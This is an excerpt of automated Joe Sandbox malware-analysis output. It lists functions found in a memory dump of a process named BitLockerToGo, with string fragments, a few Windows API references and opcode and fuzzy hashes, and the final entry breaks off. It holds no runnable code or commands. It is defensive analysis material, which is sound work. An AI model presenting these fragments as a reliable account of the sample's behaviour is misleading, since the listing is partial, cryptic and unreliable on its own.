hi, xrefs: 02AE0C4C
A{y, xrefs: 02AE0E21, 02AE0E38, 02AE0E30
A{y, xrefs: 02AE0DAB, 02AE0D84, 02AE0D8D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: A{y$A{y$\S$hi$sq
API String ID: 0-3616034559
Opcode ID: 2c27465a2f045c7e3ad615ca64400a165f47c1e1be51f400fa202a5436617aa1
Instruction ID: 5ae69538f024cfa2b96ee997191e3eb973f22958f8965cb4adb50e8356b580a6
Opcode Fuzzy Hash: 2c27465a2f045c7e3ad615ca64400a165f47c1e1be51f400fa202a5436617aa1
Instruction Fuzzy Hash: 88717170508380EBD7109F64D894A2FBBF1EF8A784F805C2CF88A97250DB79D865DB16

Function 02AFB0D7 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 942COMMON

Download Yara Rule

Strings

53, xrefs: 02AFB7D4
4`[b, xrefs: 02AFBA70

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$53
API String ID: 0-1552651976
Opcode ID: 572246cae0d3bd04eb394833dc224782e3e2a10effd22208a7dfb5f535d6207a
Instruction ID: 77b7bb00fea612afacc432a4087756ab338f847bae8382bf03f7d5dfebb2b81e
Opcode Fuzzy Hash: 572246cae0d3bd04eb394833dc224782e3e2a10effd22208a7dfb5f535d6207a
Instruction Fuzzy Hash: B76203B5904355CFDB20CFA8D8807AEB7B2FF49308F144869E69997242DB38D945CF61

Function 02AF59A0 Relevance: 4.2, Strings: 3, Instructions: 422COMMON

Download Yara Rule

Strings

4`[b, xrefs: 02AF5DE0
psru, xrefs: 02AF5BCA
pq, xrefs: 02AF59C2

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$pq$psru
API String ID: 0-1791658692
Opcode ID: 027a4c4c35c4ba0f374090df7bea1fee70e5f4f4d5f35a3d7091be5b6bcbba8b
Instruction ID: 228740e0f331f6848607a6fa4c02ec7de04e386b4256902470ac80878ab6a5c7
Opcode Fuzzy Hash: 027a4c4c35c4ba0f374090df7bea1fee70e5f4f4d5f35a3d7091be5b6bcbba8b
Instruction Fuzzy Hash: FBC1F0B19083409BD750EF94C885A2BB7F5FF86354F88481CFAC68B251EB39D915CB62

Function 02AD8340 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

), xrefs: 02AD83C6
), xrefs: 02AD83BC
IEND, xrefs: 02AD87AC

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 35ced4b9d13696d9c76850835410de425840feb854ccd0eda6ce77c381602878
Instruction ID: b6c816f7eb617412710189d7b6fcd673f1ddeb166a2221510f2721cdc40ac1fc
Opcode Fuzzy Hash: 35ced4b9d13696d9c76850835410de425840feb854ccd0eda6ce77c381602878
Instruction Fuzzy Hash: 15F1D2B5A487019FD314DF28D88572BBBE1BF84318F044A2DE99697381DB78E915CBC2

Function 02B17090 Relevance: 4.1, Strings: 3, Instructions: 321COMMON

Download Yara Rule

Strings

PZ, xrefs: 02B170B8
T, xrefs: 02B170D0
XR, xrefs: 02B170C8

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: PZ$T$XR
API String ID: 0-1000782970
Opcode ID: a28619ae2274d71fe4d10da7ab422f94f8a31f81c0a5e8ef548e3155b46a2e77
Instruction ID: fad9d94b9756933fd2af059bb6cda7fc05bbb05e613aab632e1dc63efb87d467
Opcode Fuzzy Hash: a28619ae2274d71fe4d10da7ab422f94f8a31f81c0a5e8ef548e3155b46a2e77
Instruction Fuzzy Hash: D0B11571A083808BE714DE28DC44B6FFBE6EBC5318F88496DE99597341EB31D805CB92

Function 02B16CF0 Relevance: 4.0, Strings: 3, Instructions: 287COMMON

Download Yara Rule

Strings

%&' , xrefs: 02B16EC4, 02B16ECD
4`[b, xrefs: 02B16F00
%&' , xrefs: 02B16D34, 02B16D40

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %&' $%&' $4`[b
API String ID: 2994545307-612491952
Opcode ID: 799eb33f2c9b2c345ffa8dc919e0d6929017e624b5c386b34a917132c64ccd02
Instruction ID: bcf41ee44837cca9d0e297a590f40ad991087b8eb022dcc085147c97f252b46a
Opcode Fuzzy Hash: 799eb33f2c9b2c345ffa8dc919e0d6929017e624b5c386b34a917132c64ccd02
Instruction Fuzzy Hash: E291D371A08340ABD724CB14DC80BABBBEAEF85354F944C5CF98487391EB30E954CB92

Function 02B0E20D Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02B0E20E
VariantClear.OLEAUT32 ref: 02B0E221

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: cd070147b81b36f51ea5e362888998d8936d1d87f047b9e56eb90e62480a3872
Instruction ID: 0a5af687fd2681aeae1ccde5bafbf41a458a07b37e86bd1eaac1015419c06fbb
Opcode Fuzzy Hash: cd070147b81b36f51ea5e362888998d8936d1d87f047b9e56eb90e62480a3872
Instruction Fuzzy Hash: 58D092B4940201DFC3149FA0D88C825F779FF4A3827506894F81AD7311CB35E862CF24

Function 02AD36A0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

NaN, xrefs: 02AD3705
Inf, xrefs: 02AD36FE

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: 3396d8693798f6d408cb870c78aa8940b5e9a6b50c7bb5c6721fa8b5216ba6f9
Instruction ID: 2216e88809f5fdf57948536df320ff8a242f63c5e0c98eb6a5604b914da2477d
Opcode Fuzzy Hash: 3396d8693798f6d408cb870c78aa8940b5e9a6b50c7bb5c6721fa8b5216ba6f9
Instruction Fuzzy Hash: 0EE1C4B2A083019BC704CF29C98065AB7E2EBC4754F15896DF99AD7390EB75DD448F82

Function 02B17570 Relevance: 2.9, Strings: 2, Instructions: 386COMMON

Download Yara Rule

Strings

P, xrefs: 02B17717
%&' , xrefs: 02B17873, 02B1787B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&' $P
API String ID: 0-923373239
Opcode ID: 70ffab0f0ddcdb38ed84f33c260872fac3d14572692ed64326da1e9c08b7b808
Instruction ID: 63f0919c403b915ad0e97b8abb5243408940d6ef26202247cb8ab6fe365134ca
Opcode Fuzzy Hash: 70ffab0f0ddcdb38ed84f33c260872fac3d14572692ed64326da1e9c08b7b808
Instruction Fuzzy Hash: 8BD1F3729082618FC726CE18D89071FF6E1EB84718F968A6CE8B5AB385CB71DD05D7C1

Function 02AFE9C6 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

4`[b, xrefs: 02AFEA80
', xrefs: 02AFECC9

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: '$4`[b
API String ID: 0-1380400596
Opcode ID: 8fbf7163056dd71d1e16c821bb5efd9d1a2f663f89b9fd31baa53c032013a1cb
Instruction ID: f479652c373efa28298e07122896fc106a0f6de1da278d14d7fffeb5632879ea
Opcode Fuzzy Hash: 8fbf7163056dd71d1e16c821bb5efd9d1a2f663f89b9fd31baa53c032013a1cb
Instruction Fuzzy Hash: 88C1FD7150C3808FD315CF69C59072ABFE2AB8A314F198E5CF5E9872A2CB359918CF52

Function 02B0E79E Relevance: 2.7, Strings: 2, Instructions: 246COMMON

Download Yara Rule

Strings

4`[b, xrefs: 02B0E8F0
4`[b, xrefs: 02B0EA40

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b
API String ID: 0-3640500014
Opcode ID: 59412eb362f88ddbdb451010c8cc0b481116fb4fd01fe77ef1b3c2b3a9ae1102
Instruction ID: 3fb330336d46e4ac715e4c38aab593e3dd847d8e8cbf53abcfa136acfa238c27
Opcode Fuzzy Hash: 59412eb362f88ddbdb451010c8cc0b481116fb4fd01fe77ef1b3c2b3a9ae1102
Instruction Fuzzy Hash: 9A819E70E142699FDF21CF98D880BBEBB72FB49344F544CA4EA15A7281D735E914CBA0

Function 02B16B00 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

4`[b, xrefs: 02B16CB0
%&' , xrefs: 02B16BA3, 02B16BAB

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&' $4`[b
API String ID: 0-3857453902
Opcode ID: 66ba92ebe8795b7fd08b41a2514534a36cd91f58e4877b6f2257d0f629fff464
Instruction ID: cad37851bb3638072c433a7b61c60d7d81b3cc73c46527f32fccfdb5cad8a910
Opcode Fuzzy Hash: 66ba92ebe8795b7fd08b41a2514534a36cd91f58e4877b6f2257d0f629fff464
Instruction Fuzzy Hash: C95117316083109BC7249A18CC90B2FBBFAEFC5754F958A6CE8D957390D731E824CB91

Function 02AD979A Relevance: 2.6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

Strings

0, xrefs: 02AD9830
8, xrefs: 02AD9828

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 580cc2f88cc6b0cf75db6d640956bd307d1b49abfa2b1822b3bc76a2147f4e93
Instruction ID: 8b2c3b5d63ed32ec86bdf3d0ca5a31ee1db331de3a0aa26bbc1a92dad6bbfdcb
Opcode Fuzzy Hash: 580cc2f88cc6b0cf75db6d640956bd307d1b49abfa2b1822b3bc76a2147f4e93
Instruction Fuzzy Hash: 8851003561D384CFD3158F68D08478BBBE1ABEA354F888D5DE8C49B382C675C958CB92

Function 02B19310 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

@, xrefs: 02B19378
%&' , xrefs: 02B193C3, 02B193CB

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %&' $@
API String ID: 2994545307-717135571
Opcode ID: bc3bc3b181489bf30c791c75edcbb036b60cf0f8c6f87950983e82d702761f73
Instruction ID: c502565a2834120222a7990450a5d79e0fa8c960a00657466a157a1ff2f97903
Opcode Fuzzy Hash: bc3bc3b181489bf30c791c75edcbb036b60cf0f8c6f87950983e82d702761f73
Instruction Fuzzy Hash: C5318A719083449BC324DF14D891A2BFBF9FFC9318F58992DE98897290D335DA18CB96

Function 02AFE607 Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

V\^R, xrefs: 02AFE653, 02AFE65B
ZXU^, xrefs: 02AFE628

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: V\^R$ZXU^
API String ID: 0-1847934245
Opcode ID: f56f4f1707e53735b51b953f3f58deafc2f1644d8431cbb90b018b20c5848001
Instruction ID: 3489d534edfe2bbead8c4cbdcff6eb6c4d3839711dccf9eaaccd52d13d0805ff
Opcode Fuzzy Hash: f56f4f1707e53735b51b953f3f58deafc2f1644d8431cbb90b018b20c5848001
Instruction Fuzzy Hash: 9811E67050C3A88BC3E19F95829072EBFE1AB4AB09F140D5CF6D497222C739C914CF92

Function 02AF71F0 Relevance: 2.0, APIs: 1, Instructions: 478COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 02AF75E6

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: de11472c7b0f7531d577b868fd39624dda65cfcf1f554283c3bd5cc296b5c525
Instruction ID: 51848c34a992149c340a654780a723a5fd2b42b46b52e3872a15077697fbf6cc
Opcode Fuzzy Hash: de11472c7b0f7531d577b868fd39624dda65cfcf1f554283c3bd5cc296b5c525
Instruction Fuzzy Hash: 0C0230B4508341ABD310EF54E980A2FBBF5AF86B48F504D1CF6859B241E778D909CBA7

Function 02B12DE0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

f, xrefs: 02B12F98

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 29b19267a4c10ea651798e4733cb967488374e2665c3e9d8717cf2dad591559d
Instruction ID: 41bd511d8e945a62d0373d46f07106343b1e3c64e657760af32fbac1e2138b3d
Opcode Fuzzy Hash: 29b19267a4c10ea651798e4733cb967488374e2665c3e9d8717cf2dad591559d
Instruction Fuzzy Hash: 4E22AE716083419FC715CF18C880B2ABBE6FBC9318F588AADF89597391E735D944CB92

Function 02AD4E50 Relevance: 1.8, Strings: 1, Instructions: 555COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 02AD5210

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: 00fd2001c28099dd8ca6b184e037cb03a1cd2364cf1eb5edba79a118be62a25a
Instruction ID: 853484c832217e6e581be79b0aa9b50cb0a8facde42b08d99d20af16105b80e3
Opcode Fuzzy Hash: 00fd2001c28099dd8ca6b184e037cb03a1cd2364cf1eb5edba79a118be62a25a
Instruction Fuzzy Hash: 5912E5B5E083418BE7258F18C480327BBE3AFA1219F8D856DD89B4B351EB71D849C782

Function 02AF5730 Relevance: 1.7, APIs: 1, Instructions: 239comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(02B1CB80,00000000,00000001,02B1CB70), ref: 02AF5759

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: ca704737f74aeb9f96a91bae473765fca8c18c15fda3338a677fe06f69d1a6f0
Instruction ID: fc428e003a648d4d67aea7d8e71edaecb24e2b02b89626926839a1989ba6db69
Opcode Fuzzy Hash: ca704737f74aeb9f96a91bae473765fca8c18c15fda3338a677fe06f69d1a6f0
Instruction Fuzzy Hash: 716101B1A003049BDB609BA4CCD5B7733B5FF85368F844958FA468B290FB79E805C761

Function 02AFF9E0 Relevance: 1.7, Strings: 1, Instructions: 409COMMON

Download Yara Rule

Strings

", xrefs: 02AFFCC7

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: b4dd1703a906e8b6cd7c082d905e90f367088802436f99157a31f5efb5853097
Instruction ID: 26c36e1237c5d59532c634707bff269fcff7c6b02452f058366c24ddcee191f9
Opcode Fuzzy Hash: b4dd1703a906e8b6cd7c082d905e90f367088802436f99157a31f5efb5853097
Instruction Fuzzy Hash: 54D104B2A083149FD764DFA4C49076BB7E6AB84214F08892DFA95C77C1EF38D905CB91

Function 02ADC810 Relevance: 1.6, Strings: 1, Instructions: 380COMMON

Download Yara Rule

Strings

., xrefs: 02ADC86C

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 1d838065b5ff38f657086b0659bb23ce2eea436b4fb8915cb51e8bfdda7387e0
Instruction ID: 025f7dfab175b7383fcd06b931f86575649ce83facf3539eb5cfb001bc813722
Opcode Fuzzy Hash: 1d838065b5ff38f657086b0659bb23ce2eea436b4fb8915cb51e8bfdda7387e0
Instruction Fuzzy Hash: E2C1EB72A086514BC311CE2DC88075AF7E7AFC5674FA9C65AD4D6CB3A5EB34C841CB81

Function 02B17BB0 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

0$bc, xrefs: 02B17E13, 02B17E1B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$bc
API String ID: 0-1834741830
Opcode ID: 8235265d02dbe8eed7026d1415b47409dd99d273f4370aca787adeeb3badc5e6
Instruction ID: 08cd741eb3cf080a1c74677ed536b4a06a437d4123d82d8e4285d1a0755cc437
Opcode Fuzzy Hash: 8235265d02dbe8eed7026d1415b47409dd99d273f4370aca787adeeb3badc5e6
Instruction Fuzzy Hash: 5CC1CC76A18241CFD714DF28E4A062EF7F1FB8A355F4A88ADD58697340D338E864CB91

Function 02B185A2 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

TX&!, xrefs: 02B18793, 02B1879B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: TX&!
API String ID: 0-2285087643
Opcode ID: f9ea51afa34290f24f43b14243d852835081549e5528a45ff89f2efe83c40143
Instruction ID: 95653099383e54d105d8d1f83cd3d5925a4552b129b3264c3a3c66c14d987913
Opcode Fuzzy Hash: f9ea51afa34290f24f43b14243d852835081549e5528a45ff89f2efe83c40143
Instruction Fuzzy Hash: 99A1E131A4C390CFD314DF38E0A022AFBE2EB8A251F8989ADE4C587351D73AD855CB51

Function 02AFC007 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

Q@g`, xrefs: 02AFC09A

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Q@g`
API String ID: 0-1164027427
Opcode ID: 63353699d676fb54fe113b69fc153835dea218d83d2a6366d5da8cb3fccccad0
Instruction ID: b374a49f598928ce6d1da2a30c6d0952a2e26758c59b761e97713375a4680b9d
Opcode Fuzzy Hash: 63353699d676fb54fe113b69fc153835dea218d83d2a6366d5da8cb3fccccad0
Instruction Fuzzy Hash: F0B10775D102298FDB14CF68D8507ADB7B2BF89314F1942A9D909BB382DB34AD41CF90

Function 02B1417F Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(09840B71,00000000,00000800), ref: 02B14202

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b3bfd55d8517a5214fcef722852ac82bdb17ef03a5f4603aae353dc33b01816c
Instruction ID: 3258a2373cb9281192b59da3c4c5bf433377b27bbf8d83eac442bdefe239d848
Opcode Fuzzy Hash: b3bfd55d8517a5214fcef722852ac82bdb17ef03a5f4603aae353dc33b01816c
Instruction Fuzzy Hash: 4411AC749983049FC310EF18D88062ABBF1AB55384F804C2CE5C2D3352D338D968CB52

Function 02B17D00 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

0$bc, xrefs: 02B17E13, 02B17E1B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$bc
API String ID: 0-1834741830
Opcode ID: a2b9482227ec6b729fc5f7e151f16942aea94ecd26b404e7deb0f21fe9f52eb1
Instruction ID: ee3856fa6e0055021f747f807abbccf69c5871c0a80561029cf05f71f332e7f0
Opcode Fuzzy Hash: a2b9482227ec6b729fc5f7e151f16942aea94ecd26b404e7deb0f21fe9f52eb1
Instruction Fuzzy Hash: 7891CA75A08241CFD710DF28E4A0A2EF7F5FB8A345F4A88ADD59597341C339E824CB92

Function 02B19720 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

%&' , xrefs: 02B19753, 02B1975B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: 54bac8efacd9fd436ad4439d6eb14e1beb79de5f9fb1b08932b0b62315aa3820
Instruction ID: 13949735b4024b2b691fe44cab7ce3c74e188ffb08fb616b401281dc07cb2f24
Opcode Fuzzy Hash: 54bac8efacd9fd436ad4439d6eb14e1beb79de5f9fb1b08932b0b62315aa3820
Instruction Fuzzy Hash: A781BF346087819BC724DF19C8A0A2BB7F5FF89784F8589ACE5C5CB255E731E814CB92

Function 02ADA510 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 02ADA646

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 30951a81d57310a59c17924c63e4cfe18df62154c92b1a8a7d92b10507593c8d
Instruction ID: 3d7435e4121a302207018706fdc524321fb1a857110292fab687b1695be58f31
Opcode Fuzzy Hash: 30951a81d57310a59c17924c63e4cfe18df62154c92b1a8a7d92b10507593c8d
Instruction Fuzzy Hash: FDB139712093819FC325CF18C88065BFBE1AFA9704F444E2DE5D997742D631EA18CBA6

Function 02B17D6B Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

0$bc, xrefs: 02B17E13, 02B17E1B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$bc
API String ID: 0-1834741830
Opcode ID: b8aeceb616983abcff0ec7fe0cfd6337308e7e6c21416f188314a85d1148242c
Instruction ID: f985c0e803b189dc7f31c4d023f173d032d333549ef79795b4f913cefe8f2152
Opcode Fuzzy Hash: b8aeceb616983abcff0ec7fe0cfd6337308e7e6c21416f188314a85d1148242c
Instruction Fuzzy Hash: 5081C775A18201CFD714DF68E4A0A2EF7F5FB8A385F4A88BDD59593640C338A864CB91

Function 02B056B0 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 02B0584B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
API String ID: 0-2471034898
Opcode ID: fb2b0091a66f1802e143328bb45602f2b87f8ce6554266233c2eef9899ff9531
Instruction ID: fa04c39b48c449b380ddd6550267e68fb750a6780d9dbb661ac2d1e9eec5bafb
Opcode Fuzzy Hash: fb2b0091a66f1802e143328bb45602f2b87f8ce6554266233c2eef9899ff9531
Instruction Fuzzy Hash: 0B613B32B596804BD7368D3C8CD23A96E837F96230B9C8BA9E5B1CB7D1D6259804C751

Function 02B071B0 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 02B073A1

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
API String ID: 0-2471034898
Opcode ID: fe74ba3baf768966e494d0f843b45be2f19a5c2421b87848fd9061a77d4f1d01
Instruction ID: a3c78901fee7d202ad5d74a3c0f445ffcae2fb847b533a6e2429f6a78e46bad3
Opcode Fuzzy Hash: fe74ba3baf768966e494d0f843b45be2f19a5c2421b87848fd9061a77d4f1d01
Instruction Fuzzy Hash: DB613633E9A59087D326483C4C812A9EE535BD727473EC3E6DCB18B3D1DA269C029391

Function 02B0DAF0 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

